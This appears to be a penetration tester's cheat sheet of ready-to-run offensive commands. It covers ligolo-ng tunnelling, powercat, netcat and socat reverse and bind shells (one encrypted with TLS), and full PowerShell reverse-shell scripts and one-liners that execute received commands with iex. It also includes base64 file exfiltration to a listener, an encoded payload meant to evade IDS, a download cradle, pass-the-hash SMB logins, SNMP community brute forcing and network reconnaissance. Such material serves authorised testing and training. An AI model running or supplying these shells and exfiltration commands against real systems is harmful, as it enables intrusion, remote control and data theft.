Pentester's Toolbox

1. When using on Linux as Proxy Server, we need to create a tun interface:

     sudo ip tuntap add user $(whoami) mode tun ligolo
     sudo ip link set ligolo up

2. Then add the routes to which traffic should be forwarded from the proxy server:

     sudo ip route add 192.168.216.0/24 dev ligolo

3. Then we can start the proxy server (default port 11601):

     ./ligolo-ng_proxy_0.4.4_linux -selfcert

   • -selfcert The proxy server automatically generates self-signed TLS certificates.

4. Start the agent on your target (victim) computer (no privileges are required):

     .\ligolo_agent.exe -connect 192.168.45.49:11601 -ignore-cert

   • -ignore-cert Agent will not check certificate.

5. Back to proxy server and start session in order to forward traffic to reverse TCP connection:

     session <session id>
     start

6. Then verify that traffic is forwarded through the tunnel created from a reverse TCP/TLS connection:

     crackmapexec smb 192.168.216.0/24

Type the following command on Ligolo proxy to create a listener on agent which forward the traffic that received on a particular port to Ligolo proxy server on the specified port:

  listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444

• --addr 0.0.0.0:1234 Create listener on port 1234 that listen on all interface available on Ligolo agent.
• --to 127.0.0.1:4444 Once received the traffic from Ligolo agent, forward it to specified IP address and port.

Check the previously created listener:

  listener_list

Server:

  sudo nc -lnvp 443 > receiving_powercat.ps1

Client:

    powercat -c 10.10.0.4 -p 443 -i C:\Users\Public\powercat.ps1

• -i Indicates local file that will be transfer to netcat listener.

Server:

  sudo nc -lvp 443

Client:

  powercat -c 10.10.0.4 -p 443 -e cmd.exe

Server:

  powercat -l -p 443 -e cmd.exe

Client:

  nc 10.10.0.22 443

Server:

  sudo nc -lvp 443

This command will create Powershell script that can be used without Powercat (hence the name stand-alone) to send reverse shell to a listener 10.10.0.4 on port 443:

  powercat -c 10.10.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

Client:

  powercat -c 10.10.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

• -e Create a stand-alone script in base64 format which prevent from detecting by IDS.

Server side - Redirect STDOUT to client on port 443

  sudo socat TCP4-LISTEN:443 STDOUT

Client side

  socat - TCP4:<remote server's ip address>:80

Server side:

  sudo socat TCP4-LISTEN:443,fork file:secret.txt

• TCP4-LISTEN Specifies an IPv4 listener
• fork Creates a child process once a connection is made by a client to allow multiple connections.
• file File to be transferred.

Client side:

  socat TCP4:10.10.0.4:443 file:received_passwords.txt,create

• create Create a new file.

Server side:

  socat -d -d TCP4-LISTEN:443 STDOUT

• -d -d Increase verbosity

Client side:

  socat TCP4:10.10.0.22:443 EXEC:/bin/bash

Server side Use tls to encrypt bind shell connections by creating a self-signed certificate.

  openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

• req Initiate a new certificate signing request
• -newkey Generate a new private key
• rsa:2048 Use RSA encryption with a 2,048-bit key length.
• -nodes Store the private key without passphrase protection
• -keyout Save the key to a file
• -x509 Output a self-signed certificate instead of a certificate request
• -days Set validity period in days
• -out Save the certificate to a file

Once certificate created convert it to a format socat accepts :

  cat bind_shell.key bind_shell.crt > bind_shell.pem

Create a listener :

  sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

• verify Disable SSL verification.
• fork Spawn a child process once a connection is established.

Client side

  socat - OPENSSL:10.11.0.4:443,verify=0

• - Transfer STDIO to remote host
• OPENSSL Establish a remote SSL connection

  powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\Public\Desktop\wget.exe')"

• -c: run the command inside double quotes in Powershell.
• new-object: this cmdlet instantiate .Net Framework or a COM object. The above command will create an instance of the WebClient class.
• WebClient: This class is used to access resources identified by a URI which is implemented in the System.Net namespace.
• DownloadFile: Methode defined in WebClient class which download the remote data.

Refer to the Microsoft System.Net reference, to see the list of all of the implemented classes and follow through to the WebClient class to visualize the structure of classes and methods used in the above command.

Netcat listen on port 443 and pipe the output to base64 to decode the received data:

  nc -nvlp 4446 | base64 --decode > test.zip

On Windows, send the file data in base64 encoded format to Netcat listener:

$encoded_data=[System.Convert]::ToBase64String([io.file]::ReadAllBytes("C:\users\Public\Downloads\test.zip"));
# Or read the entire file to an array of bytes.
# $bytes = [System.IO.File]::ReadAllBytes("C:\users\Public\mess.txt")
$socket = New-Object net.sockets.tcpclient('192.168.45.188',4446);
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$writer.WriteLine($encoded_data);
$writer.flush();
$socket.close();

Set a listener to receive a reverse shell from Windows machine using Powershell:

  sudo nc -lnvp 443

Send reverse shell using Powershell to Netcat listener:

  $client = New-Object System.Net.Sockets.TCPClient('192.168.1.20',443);
  $stream = $client.GetStream();
  [byte[]]$bytes = 0..65535|%{0};
  while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  {
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (iex $data 2>&1 | Out-String );
      $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush();
  }
  $client.Close();

An important command that we use to execute received command is iex, which is an alias of cmdlet Invoke-Expression.

Send a reverse shell using Powershell one-liner:

$client = New-Object System.Net.Sockets.TCPClient('192.168.1.20',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

  $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);
  $listener.start();
  $client = $listener.AcceptTcpClient();
  $stream = $client.GetStream();
  [byte[]]$bytes = 0..65535|%{0};
  while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  {
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (iex $data 2>&1 | Out-String );
      $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush()
  }
  $client.Close();
  $listener.Stop()

This time we create new listener variable that uses the System.Net.Sockets.TcpListener class, make listening on all network interface using 0.0.0.0 and on port 443. Then this Powershell code executes received data as command using iex.

The Test-NetConnection function checks if an IP responds to ICMP and whether a specified TCP port on the target host is open. Verify if the SMB port 445 is open on 192.168.5.151:

  Test-NetConnection -Port 445 192.168.5.151

We can also check for open port by initiating TCP connection as Test-NetConnection send additional traffic that is non needed for our purposes:

  1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.5.151", $_)) "TCP port $_ is open"} 2>$null

We start by piping the first 1024 integer into a for-loop which assigns the incremental integer value to the $_ variable. Then, we create a Net.Sockets.TcpClient object and perform a TCP connection against the target IP on port specified by $_ variable, and if the connection is successful, it prompts a message that includes the open TCP port.

List all local users:

  net user

Get information about a user (about groups that user belongs to, full name, etc…):

  net user john

• john A local user account

List users in a group:

  net localgroup Users

• Users A local group

Get information about a domain user (groups that user belongs to, full name, etc…):

  net user stevan /domain

• stevan A domain user

PowerShell script that checks privilege escalation vectors on Windows system.

Download and import the script before using:

  Import-Module .\PowerView.ps1

Get detailed information about a specified service:

  Get-ServiceDetail

Enumerate services with unquoted paths:

  Get-UnquotedService

Enumerate services where the current user has write permission on the service binary:

  Get-ModifiableServiceFile

Enumerate services the current user can modify:

  Get-ModifiableService

Enumerate for DLL Hijacking:

  Find-ProcessDLLHijack

For more information check the documentation.

A tool is that enumerates for privilege escalation vectors:

.\winPEAS.exe

• https://www.whiteoaksecurity.com/blog/cypher-query-primer-bloodhound/
• https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
• https://bloodhound.readthedocs.io/en/latest/data-analysis/nodes.html#group-members

Find the IP address of www.atomicl.net:

  host www.atomicl.net

By default, the host command looks for an A record, but we can also query other fields, such as MX or TXT records:

  host -t mx atomicl.net

Search for name server:

  host -t ns atomicl.net

DNSRecon is an advanced DNS enumeration script written in Python:

  dnsrecon -d atomicl.net -t std

• -d option to specify a domain name.
• -t Type of enumeration to perform, in this case, a standard scan

DNSRecon is also capable of brute forcing subdomain using a provided word list:

  dnsrecon -d atomicl.net -D ~/wordlist.txt -t brt

• -t brt Stands for brute force

DNSEnum is another popular DNS enumeration tool that can be used to further automate DNS enumeration:

  dnsenum atomicl.net

Netcat is not a port scanning tool but it can be used to do some basic port scanning.

  nc -nvv -w 1 -z 192.168.5.151 3388-3390

  nc -nv -u -z -w 1 10.11.1.115 160-162

  sudo nmap -sS 10.10.1.222

-sS: Sending SYN packets without completing a three-way handshake or this will not send ACK packet after receiving SYN-ACK packet from an open port. Default behavior when running nmap with sudo privilege. -sT: Complete three-way handshake, default scanning technique when running nmap without sudo privilege. -sU: Perform UDP port scan using ICMP port unreachable method and for common UDP ports it uses protocol-specific packet. E.g for port 161 it send SNMP packet.

Host discovery on the specified IP range:

  nmap -sn 10.10.1.1-254

Host discovery and save the output to grepable format:

  nmap -v -sn 10.10.1.1-254 -oG ping-sweep.txt

Scan top 20 commonly used ports:

  nmap -sT -A --top-ports=20 10.10.1.1-254 -oG top-port-sweep.txt

Commonly used ports are defined in the /usr/share/nmap/nmap-services file.

OS Fingerprinting:

  sudo nmap -O 10.10.1.220

Banner Grabbing/Service Enumeration

  nmap -sV -sT -A 10.10.1.220

• -sV Grab service banners
• -A Use OS and service enumeration scripts

Nmap Scripting Engine (NSE) which performs DNS enumeration, brute force attacks, vulnerability identification, etc. NSE scripts are located in the /usr/share/nmap/scripts directory.

  nmap 10.10.1.220 --script=smb-os-discovery

• smb-os-discovery script attempts to connect to the SMB service on a target system and determine its operating system.

Get info about a script:

  nmap --script-help dns-zone-transfer

NetBIOS is a service that allows applications and computers to communicate over a local area network (LAN). NetBIOS provides three distinct services:

1. Name Service (NetBIOS-NS) for name registration and resolution. Port UDP 137.
2. Datagram Distribution Service (NetBIOS-DGM) for connectionless communication. Port UDP 138.
3. Session Service (NetBIOS-SSN) for connection-oriented communication on top of which SMB runs. Port TCP 139.

While modern implementations of SMB can work without NetBIOS, NetBIOS over TCP (NBT) is required for backward compatibility and is often enabled together.

For this reason, enumeration of NetBIOS and SMB services is needed:

  nmap -v -p 139,445 -oG smb.txt 10.10.1.1-254

There are also more specialized tools for identifying NetBIOS information:

  sudo nbtscan -r 10.10.1.0/24

-r: Use local port 137 for scans which is used to query the NetBIOS name service for valid NetBIOS names.

Nmap contains many useful scripts in the /usr/share/nmap/scripts/smb directory that can be used to enumerate SMB services.

E.g Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) using smb-os-discovery script:

  nmap -v -p 139, 445 --script=smb-os-discovery 10.10.1.227

-v: Increase the verbosity level.

The enum4linux enumerates SMB shares, password policy, OS information, users, group membership, Nbtstat info and determine if host is in workgroup or domain:

  enum4linux 192.168.207.13

In Windows system we can use net view to list domains, resources, and computers belonging to a given host. As an example, we can list all the shares running on dc01:

net view \\dc01 /all

• /all lists all administrative shares which are ending with the dollar sign.
• We can also replace host name dc01 with IP address of the system.

Authenticate to the SMB server using NLTM hash:

  smbclient \\\\192.168.189.248\\transfer -U john --pw-nt-hash 54abdf854v8cz653b1be3458454e5a4d

Enumerate SMB shares using NTLM hash of a user:

  smbmap  -u username -p '54abev854d8c065vb1be3458454e4a3d' -H 192.168.189.248

Scan SNMP port UDP 161 using Nmap:

  sudo nmap -sU --open -p 161 10.10.1.1-254 -oG open-snmp.txt

Use onesixtyone, a SNMP scanner which discover devices responding to well-known community names or to mount a dictionary attack against one or more SNMP devices.

To brute force a list of community names, lets build a word list of community names:

  echo public > community.txt
  echo private >> community.txt
  echo manager >> community.txt

Then perform brute force using onesixtyone:

  onesixtyone -c community.txt -i ips.txt 10 10.10.1.14

Enumerating the entire MIB tree of Windows system that exposes SNMP port:

  snmpwalk -c public -v1 -t 10 10.10.1.14

• -c: specifies the community string.
• -v: specifies the SNMP version number.
• -t: increases the timeout period to 10 seconds.

Enumerating Windows users:

  snmpwalk -c public -v1 10.10.1.14 1.3.6.1.4.1.77.1.2.25

Enumerating running Windows processes

  snmpwalk -c public -v1 10.10.1.73 1.3.6.1.2.1.25.4.2.1.2

Enumerating open TCP Ports

  snmpwalk -c public -v1 10.10.1.14 1.3.6.1.2.1.6.13.1.3

Enumerating installed software

  snmpwalk -c public -v1 10.10.1.50 1.3.6.1.2.1.25.6.3.1.2

Enumerate all MIBs:

  snmpbulkwalk -c public -v2c 10.10.1.50 .

• -c Community string.
• -v2c SNMP version.

Query the extension MIB (NET-SNMP-EXTEND-MIB) which is used to run arbitrary shell scripts and the result will be send SNMP client:

  snmpbulkwalk -c public -v2c 192.168.213.156 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

• https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp/
• https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp/snmp-rce
• https://access.redhat.com/documentation/fr-fr/red_hat_enterprise_linux/6/html/deployment_guide/sect-system_monitoring_tools-net-snmp-extending